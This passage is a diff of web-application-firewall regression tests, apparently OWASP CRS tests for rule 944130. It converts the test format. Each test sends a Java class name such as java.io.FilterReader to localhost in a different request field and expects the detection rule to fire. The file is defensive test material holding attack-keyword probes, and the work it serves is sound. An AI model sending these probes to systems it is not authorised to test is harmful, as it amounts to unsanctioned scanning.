- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.io.FilterInputStream\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-121
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.io.FilterInputStream\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 121
 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.io.FilterInputStream\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-122
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.io.FilterInputStream\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 122
 desc: "Argument test includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.FilterOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-123
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.FilterOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 123
 desc: "Argument name includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterOutputStream=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-124
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterOutputStream=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 124
 desc: "Cookie test includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.io.FilterOutputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-125
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.io.FilterOutputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 125
 desc: "Cookie name includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.io.FilterOutputStream=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-126
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.io.FilterOutputStream=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 126
 desc: "Request header test includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.io.FilterOutputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-127
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.io.FilterOutputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 127
 desc: "XML attribute value includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-128
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 128
 desc: "XML element value includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-129
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 129
 desc: "Nested XML element value includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-130
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 130
 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.FilterOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-131
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.FilterOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 131
 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.io.FilterOutputStream\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-132
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.io.FilterOutputStream\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 132
 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.io.FilterOutputStream\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-133
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.io.FilterOutputStream\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 133
 desc: "Argument test includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.FilterReader"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-134
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.FilterReader"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 134
 desc: "Argument name includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterReader=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-135
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterReader=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 135
 desc: "Cookie test includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.io.FilterReader
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-136
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.io.FilterReader
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 136
 desc: "Cookie name includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.io.FilterReader=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-137
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.io.FilterReader=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 137
 desc: "Request header test includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.io.FilterReader
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-138
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.io.FilterReader
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 138
 desc: "XML attribute value includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-139
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 139
 desc: "XML element value includes keyword java.io.FilterReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterReader"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-140
+ -
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 